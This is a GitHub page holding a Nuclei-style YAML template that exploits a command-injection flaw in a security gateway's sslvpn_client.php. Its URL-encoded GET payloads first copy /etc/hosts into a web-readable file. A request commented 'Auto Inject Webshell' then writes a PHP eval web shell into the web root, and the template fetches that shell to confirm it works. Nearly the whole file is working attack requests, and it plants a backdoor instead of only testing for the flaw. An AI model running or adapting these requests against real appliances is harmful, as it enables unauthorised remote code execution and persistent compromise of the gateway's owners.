-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathmulti-sslvpn-gateway.yaml
127 lines (122 loc) · 4.34 KB
/
multi-sslvpn-gateway.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
id: multi-sslvpn-gateway-rce
info:
name: Multiple Security Gateway Frontend RCE
author: Esonhugh-self-maintained
severity: critical
description: |
Multiple Security Gateway Frontend RCE
reference:
- "https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Multiple-Security-Gateway-Frontend-RCE.json"
tags: rce,shell,php,sslvpn
requests:
- method: GET
path:
- "{{BaseURL}}/sslvpn/sslvpn_client.php"
redirects: true
matchers:
- type: status
status:
- 200
- method: GET
path:
- "{{BaseURL}}/sslvpn/sslvpn_client.php?client=logoImg&img={{randstr}}%20%2f%74%6d%70%20%7c%7c%20%63%70%20%2f%65%74%63%2f%68%6f%73%74%73%20%2f%75%73%72%2f%6c%6f%63%61%6c%2f%77%65%62%75%69%2f%77%65%62%75%69%2f%69%6d%61%67%65%73%2f%62%61%73%69%63%2f%6c%6f%67%69%6e%2f%6d%61%69%6e%5f%6c%6f%67%6f%32%31%2e%74%78%74%20%7c%7c%20%6c%73"
headers:
Connection: close
Upgrade-Insecure-Requests: "1"
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: "?1"
Sec-Fetch-Dest: iframe
Referer: "{{BaseURL}}"
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
redirects: true
matchers:
- type: status
status:
- 200
- type: word
words:
- "{{randstr}}"
- method: GET
path:
- "{{BaseURL}}/webui/images/basic/login/main_logo21.txt"
headers:
Connection: close
Upgrade-Insecure-Requests: "1"
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: "?1"
Sec-Fetch-Dest: iframe
Referer: "{{BaseURL}}"
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
redirects: true
matchers:
- type: status
status:
- 200
- type: word
words:
- "localhost"
# Auto Inject Webshell at
# /usr/local/webui/webui/images/basic/login/main_logo_helper.php
- method: GET
path:
- "{{BaseURL}}/sslvpn/sslvpn_client.php?client=logoImg&img={{randstr}}%20/tmp%20%7C%7C%20echo%20%27%3CEnabled--%3E%3C%3Fphp%20%40eval%28%24_REQUEST%5B%22pass%22%5D%29%3B%20%3F%3E%20%27%20%3E%20/usr/local/webui/webui/images/basic/login/main_logo_helper.php%20%7C%7C%20ls"
headers:
Connection: close
Upgrade-Insecure-Requests: "1"
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: "?1"
Sec-Fetch-Dest: iframe
Referer: "{{BaseURL}}"
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
redirects: true
matchers:
- type: status
status:
- 200
- type: word
words:
- "{{randstr}}"
- method: GET
path:
- "{{BaseURL}}/webui/images/basic/login/main_logo_helper.php"
headers:
Connection: close
Upgrade-Insecure-Requests: "1"
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: "?1"
Sec-Fetch-Dest: iframe
Referer: "{{BaseURL}}"
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
redirects: true
matchers:
- type: status
status:
- 200
- type: word
words:
- "<!--Enabled-->"
extractors:
- type: dsl
dsl:
- "body"
# digest: 490a00463044022074760d59da3dfbf65665b46c7d3bacd41c026f6ae9e3530d1e2f4a4746db85fd022058b7125782c2beb6dada26d4958df0754417a9a3f24db4c3d9a85c554ee897b8:569246fd1e83ae0648e1a21ffb4fe811